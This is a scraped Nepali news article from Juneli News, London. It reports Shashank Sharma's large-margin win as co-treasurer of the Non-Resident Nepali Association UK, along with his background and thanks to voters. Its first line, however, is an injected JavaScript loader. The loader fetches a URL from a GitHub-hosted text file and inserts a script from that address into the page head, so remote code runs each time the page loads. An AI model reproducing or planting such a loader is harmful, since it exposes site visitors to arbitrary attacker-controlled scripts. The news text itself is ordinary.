;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, लण्डन | एनआरएन युकोको सह-कोषाध्यक्षमा शशांक शर्मा भारि मतान्तरले विजयी भएका छन् | सह-कोषाअध्यक्ष पदका उम्मेदवार शशांक शर्माले करिब ११ हजार को भोटिङ अधिकार भएको गैर आबासिय नेपाली संघ बेलायतमा आफ्ना प्रतिद्वन्दी हेम कुमार गुरुङलाई करिब २१०० मतको अन्तरले पराजित गरेका छन।यो बिजय गैर आबासिय नेपाली संघ बेलायत को २० औं बर्षको इतिहासमा सबै भन्दा बढी मतान्तरको बिजय हो।
शर्मा बाग्लुङ जिल्ला सर्कुवा मौलाछका हुन र सोहि जिल्लाको जनता मा बि सर्कुवाबाट स्कुल लेभल र त्रिभुवन विश्व विधालय केन्द्रिय क्याम्पस किर्तीपुर बाट उच्च शिक्षा पुरा गरेका थिए। समाजसास्त्रमा बिद्धाबारधी गर्न युरोप पुगेका शशांक बिभीन्न कारणले बिद्धाबारिदी गर्न नपाई २००७ बाट बेलायतमा ब्यापार र समाजका बिभीन्न क्षेत्रमा काम गर्दे आएका छन। आगामी कामको बारेमा प्रश्न गर्दा शशांक गैर आबासिय नेपाली संघ बेलायतमा सह- कोषाध्यक्ष पद सानो भएपनी यसले आम नेपालीहरु बिच विश्व स्तरको सामाजिक सम्बन्ध बनाउने र काम गर्ने बाटो बनेकोमा शर्माले गैर आबासिय नेपाली संघ बेलायतका मतदाताहरुमा हार्दिक आभार प्रकट गरेका छन।करिब तिन लाख बराबरको नेपाली बसोबास रहेको बेलायतमा ११५६३ जनाले मतदानमा भाग गरेका थिए।
फेसबुक प्रतिक्रियाहरु